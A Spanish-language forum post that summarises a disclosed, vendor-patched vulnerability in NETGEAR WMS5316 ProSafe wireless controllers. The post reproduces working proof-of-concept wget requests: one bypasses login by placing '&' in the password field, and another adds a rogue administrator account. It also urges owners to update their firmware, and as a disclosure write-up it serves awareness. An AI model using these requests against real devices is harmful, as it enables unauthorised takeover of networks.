Los NETGEAR WMS5316 ProSafe 16AP no parecen muy "safe" (Pagina 1) / Seguridad y Hacking / Foro Wifi-libre.com

Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Paginas:: 1

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 08-09-2015 17:07:58

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,035

Los NETGEAR WMS5316 ProSafe 16AP no parecen muy "safe"

El switch NETGEAR WMS5316 ProSafe (16AP) comprometido por entrada sin credenciales y escala de privilegios

prosafe1.jpg

El "pro safe" es un switch de Netgear para redes profesionales.
Con este dispositivo se puede crear una red de hasta 16 puntos de accesos que controlamos gracias a la interfaz en java proporcionada por Netgear
Elliot LEWIS explica hoy como saltarse los credenciales para entrar en la interfaz de gestión de la red.
Y luego nos explica como obtener los privilegios de administrador para hacer modificaciones en la configuración.
Elliot ha descubierto la brecha en mayo y ha trabajado conjuntamente con Netgear.
Así que la vulnerabilidad esta corregida a partir del firmware que ha sacado en junio el fabricante.
Para los numerosos empresarios miembros de wifi-libre - y dios sabe que son muchos big_smile - es muy importante hacer un update de su "ProSafe"

Para los demás interesemos-nos a los mecanismos descritos en el full disclosure :

¿Como entrar en la GUI de gestión de la red sin conocer los credenciales? : ¡Con &!
[-] Proof of Concept:
=================
wget --keep-session-cookies --save-cookies=cookies.txt
--post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D"
http://192.168.1.2/login_handler.php && wget
--load-cookies=cookies.txt

En el ejemplo usamos wget para  forzar la entrada y crear una sesión gracias a un coockie.
Para lograr que no seamos rechazados debemos incluir el símbolo & en  la contraseña que mandamos en nuestros datas POST para autenticarse.
Podéis ver en el ejemplo que nos da el POC que se pone un simple & aqui

password%22%3A%20%22&%22%7D

Pasado un momento la GUI va a aceptarnos  y podremos visitar la GUI con ellos. big_smile

¿Como obtener los privilñegios de administrador para hacer lo que queremos? 
--post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D"
http://192.168.1.2/request_handler.php

La idea aquí es simplemente de añadir con datas POST otra cuenta root. 
Una vez hecho la usaremos para tomar el control de la red.
No será necesario esta vez usar el símbolo &

¡Hasta la próxima!

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Paginas:: 1

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Pegado:
Pegado:: Exclusiva: Rompiendo de una vez por todas las Orange-XXXX por kcdtv
16 1208 Ayer 21:07:04 por sancakoky
Pegado:
Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher  [ 1 2 3 7 ]
173 18259 Ayer 13:20:50 por juandiegomu
Pegado:
Pegado:: Hostbase 1.0 released por Koala  [ 1 2 3 4 5 ]
106 3165 16-08-2017 23:54:19 por Koala
problema con telecentro wifizone y Ba wifi por marquin
1 45 15-08-2017 15:16:09 por kcdtv
Pegado:
Pegado:: Documentación y soporte para reaver 1.6.1 y versiones posteriores por kcdtv
5 504 14-08-2017 19:19:57 por Squirel

Pie de página

Información del usuario

Ultimo usuario registrado: lechugapaco
Usuarios registrados conectados: 1
Invitados conectados: 16

Conectados: M1ck3y

Estadisticas de los foros

Número total de usuarios registrados: 611
Número total de temas: 837
Número total de mensajes: 6,706

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22

Usuarios en Línea hoy:
M1ck3y, Koala, martim, sebaa, Virkon
© 2014-2017 Wifi-libre.com - [ Generated in 0.019 seconds ]